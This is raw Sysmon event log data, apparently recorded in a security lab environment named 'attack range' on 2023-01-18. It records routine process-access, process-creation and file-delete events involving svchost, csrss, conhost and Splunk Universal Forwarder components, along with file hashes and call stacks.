12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016103Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016102Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016101Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E410-63C7-F901-00000000B002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016100Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.290{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E410-63C7-F901-00000000B002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016099Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.291{E5A8D418-E410-63C7-F901-00000000B002}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016098Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:32.177{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DC2B803767D8DE6489CCF53450246B9,SHA256=E4A3B22F1BF103D863ABDBD9DAD94EF8D6B0545E0FCB95A99AA364303329245B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.596{FE4C2B44-E410-63C7-1D06-00000000AF02}16004172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E410-63C7-1D06-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E410-63C7-1D06-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E410-63C7-1D06-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.443{FE4C2B44-E410-63C7-1D06-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.440{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98DACB0E9F146DC3861789DC6E95FF64,SHA256=49FC9FC9EB0BCB4E7F84ADD601952DF7853C8F584742375D4622B53886F6B326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:32.252{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000016127Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:33.510{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3FE2963CD0B94D195C1A8BFF25454E1,SHA256=F0B7FDF256A8DDDB20F5ED50CECD3DB79C0D6D015C263968D3DC116DAE96B197,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E411-63C7-1F06-00000000AF02}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E411-63C7-1F06-00000000AF02}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E411-63C7-1F06-00000000AF02}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.955{FE4C2B44-E411-63C7-1F06-00000000AF02}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000041394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.310{FE4C2B44-E411-63C7-1E06-00000000AF02}5176500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.294{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD9294EA418B857CF1FD8DA72CB5FEA,SHA256=205641205765130AB2E45CA53F1C7809D4F7D52BF200AA9E226DCA0C16E8BB39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:33.106{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E411-63C7-1E06-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 